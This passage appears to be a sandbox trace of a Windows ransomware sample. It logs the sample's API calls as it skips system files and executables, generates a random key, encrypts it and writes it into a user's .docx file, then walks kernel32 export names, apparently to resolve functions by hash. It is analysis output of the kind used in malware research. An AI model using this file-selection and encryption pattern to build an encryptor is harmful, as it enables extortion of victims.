(lpString1="AcdcPPw5PxakniwP.docx", lpString2="ntuser.dat.log") returned -1 [0084.471] lstrcmpiW (lpString1="AcdcPPw5PxakniwP.docx", lpString2="thumbs.db") returned -1 [0084.471] lstrcmpiW (lpString1="AcdcPPw5PxakniwP.docx", lpString2="Bootfont.bin") returned -1 [0084.471] lstrlenW (lpString="AcdcPPw5PxakniwP.docx") returned 21 [0084.471] lstrcmpiW (lpString1="docx", lpString2="lnk") returned -1 [0084.472] lstrcmpiW (lpString1="docx", lpString2="exe") returned -1 [0084.472] lstrcmpiW (lpString1="docx", lpString2="sys") returned -1 [0084.472] lstrcmpiW (lpString1="docx", lpString2="dll") returned 1 [0084.472] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\") returned 75 [0084.472] lstrlenW (lpString="AcdcPPw5PxakniwP.docx") returned 21 [0084.472] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\" [0084.472] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpString2="AcdcPPw5PxakniwP.docx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\AcdcPPw5PxakniwP.docx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\AcdcPPw5PxakniwP.docx" [0084.472] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.472] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\AcdcPPw5PxakniwP.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\acdcppw5pxakniwp.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0084.472] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=22491) returned 1 [0084.472] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0084.472] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.472] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.473] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.473] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.473] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0084.473] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.474] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.474] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.474] CloseHandle (hObject=0x43c) returned 1 [0084.474] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.474] WriteFile (in: hFile=0x438, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0084.475] CloseHandle (hObject=0x0) returned 0 [0084.475] CloseHandle (hObject=0x438) returned 1 [0084.475] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.476] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.476] GetTickCount () returned 0x114d94f [0084.476] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.476] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.476] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.476] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.476] lstrlenA (lpString="kernel32.dll") returned 12 [0084.477] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.477] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.477] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.477] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.477] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.477] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.477] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.477] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.477] lstrlenA (lpString="ADDATOMA") returned 8 [0084.477] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.477] lstrlenA (lpString="ADDATOMW") returned 8 [0084.477] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.477] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.477] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.477] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.477] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.477] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.477] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.477] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.477] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.477] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.477] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.477] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.477] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.477] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.477] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.477] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.477] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.477] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.477] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.478] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.478] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.478] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.478] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.478] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.478] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.478] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.478] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.478] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.478] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.478] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.478] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.478] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.478] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.478] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.478] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.478] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.478] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.478] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.478] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.478] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.478] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.478] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.478] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.478] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.478] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.478] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.478] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.478] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.478] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.478] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.478] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.478] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.478] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.478] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.478] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.478] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.478] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.479] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.479] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.479] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.479] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.479] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.479] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.479] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.479] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.479] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.479] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.479] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.479] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.479] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.479] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.479] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.479] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.479] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.479] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.479] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.479] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.479] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.479] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.479] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.479] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.479] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.479] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.479] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.479] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.479] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.479] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.479] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.479] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.479] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.479] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.479] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.479] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.479] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.480] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.480] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.480] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.480] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.480] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.480] lstrlenA (lpString="BEEP") returned 4 [0084.480] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.480] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.480] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.480] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.480] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.480] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.480] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.480] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.480] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.480] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.480] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.480] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.480] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.480] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.480] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.480] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.480] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.480] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.480] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.480] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.480] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.480] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.480] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.480] lstrlenA (lpString="CANCELIO") returned 8 [0084.480] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.480] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.480] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.480] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.480] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.480] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.480] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.481] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.481] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.481] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.481] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.481] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.481] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.481] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.481] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.481] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.481] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.481] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.481] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.481] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.481] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.481] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.481] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.481] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.481] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.481] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.481] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.481] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.481] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.481] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.481] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.481] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.481] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.481] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.481] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.481] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.481] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.481] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.481] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.481] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.481] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.481] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.481] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.482] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.482] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.482] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.482] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.482] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.482] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.482] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.482] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.482] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.482] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.482] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.482] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.482] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.482] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.482] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.482] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.482] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.482] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.482] 